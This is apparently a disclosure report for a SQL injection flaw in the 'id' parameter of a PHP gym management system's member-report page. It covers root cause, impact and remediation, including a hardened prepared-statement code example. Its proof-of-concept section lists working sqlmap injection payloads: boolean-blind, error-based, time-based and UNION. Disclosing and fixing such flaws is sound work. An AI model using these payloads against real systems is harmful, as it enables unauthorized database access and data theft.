Key Information Summary

Vulnerability Details

Affected Product: Gym Management System
Vendor Homepage: https://codeastro.com/gym-management-system-in-php-mysql-with-source-code/
Affected/Fixed Version: V1.0
Vulnerable File: /Gym-System/admin/view-member-report.php?id=%206
Software Link: https://codeastro.com/gym-management-system-in-php-mysql-with-source-code/
Vulnerability Type: SQL Injection

Root Cause:
- A SQL injection vulnerability exists in the file /Gym-System/admin/view-member-report.php?id=%206. It occurs because the value of the 'id' parameter is not validated before being used directly in SQL queries, allowing attackers to forge input values and manipulate the queries to perform unauthorized operations.

Impact:
- Attackers can exploit this SQL injection vulnerability to gain unauthorized access to the database, leak sensitive data, tamper with data, take full control of the system, or cause service disruption, posing a serious threat to system security and business continuity.

Description:
- During the review of the "Gym Management System", I discovered a critical SQL injection vulnerability in the file /Gym-System/admin/view-member-report.php?id=%206. The vulnerability arises from insufficient validation of user input for the 'id' parameter, enabling attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to ensure system security and protect data integrity.

Vulnerability Details and POC

Vulnerability Alias: 'id' parameter

Payloads:
...
sqlmap output for the vulnerable parameter:

```text
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6' AND 8161=8161 AND 'LXYF'='LXYF

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=6' OR (SELECT 4971 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(4971=4971,1))),0x717a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xFDh'='xFDh

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=6' AND (SELECT 6626 FROM (SELECT(SLEEP(5)))geNI) AND 'sDUF'='sDUF
    ...

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7071,(SELECT CONCAT(SUBSTRING((SELECT (ELT(500=500))),1,7),0x20,(SELECT VERSION()),0x20,(SELECT SUBSTRING(232519744,13,1)),0x20,FLOOR(RAND(0)*2))),0x717a6a71,ETC ...
```

Screenshots of Specific Information Obtained by Testing and Running the sqlmap Tool

[screenshots not included in this copy of the report]

Recommended Remediation

1. Use Prepared Statements and Parameter Binding:
- Prepared statements prevent SQL injection by separating SQL code from user input. With a prepared statement, user-provided values are sent to the database as plain data and are never parsed as part of the SQL statement.

2. Input Validation and Filtering:
- Strictly validate and filter user input to ensure it conforms to the expected format (for the 'id' parameter, a positive integer) before it is used at all.

3. Minimize Database User Privileges:
- Ensure that the database connection account has only the minimum privileges it needs, and avoid using high-privilege accounts (such as 'root' or 'admin') for routine operations, so that a successful injection cannot read or modify data beyond the application's own tables.

4. Regular Security Audits:
- Conduct regular code and system security audits to promptly identify and fix potential security vulnerabilities.
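The following is an added example of remediation items 1 to 3 applied to a member-report page, written for this report and not taken from the Gym Management System's source. The table and column names (`members`, `id`, `name`), the database name, and the `gym_app` account are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not the project's code): hardened handling of the 'id'
// parameter. Table/column names and credentials are assumptions.
//
// Vulnerable pattern the report describes (string concatenation, never do this):
//   $sql = "SELECT * FROM members WHERE id = '" . $_GET['id'] . "'";

// 1. Input validation: the report id must be a positive integer, so any
//    value carrying quotes or SQL keywords is rejected before the DB is touched.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Invalid member id');
}

// 3. Least privilege: connect as an account that only has SELECT on the
//    application's tables (assumed name: gym_app), never as root.
$pdo = new PDO(
    'mysql:host=localhost;dbname=gym;charset=utf8mb4',
    'gym_app',
    getenv('GYM_DB_PASSWORD') ?: '',
    [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        // Native server-side prepares: the driver never builds the query
        // by interpolating the bound value into the SQL text.
        PDO::ATTR_EMULATE_PREPARES   => false,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]
);

// 2. Prepared statement: the SQL text is fixed; the value is bound as data
//    and cannot change the structure of the statement.
$stmt = $pdo->prepare('SELECT id, name FROM members WHERE id = :id');
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$member = $stmt->fetch();

if ($member === false) {
    http_response_code(404);
    exit('No such member');
}

// Escape on output so a stored value cannot become a script in the page.
echo 'Report for ', htmlspecialchars($member['name'], ENT_QUOTES, 'UTF-8');
```

With this in place, every payload listed above is rejected at the integer check, and even an input that passed validation could only ever be treated as a numeric value by the database.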